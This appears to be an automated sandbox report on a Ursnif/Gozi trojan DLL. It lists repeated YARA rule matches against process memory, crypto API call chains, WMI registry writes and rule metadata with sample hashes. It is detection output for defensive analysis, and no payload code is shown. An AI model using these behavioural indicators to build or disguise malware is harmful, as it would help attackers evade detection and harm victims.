Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	3_2_02AF47E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	4_2_02E347E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	5_2_045E47E5

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: ursnif_IAT_corrected.exe.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
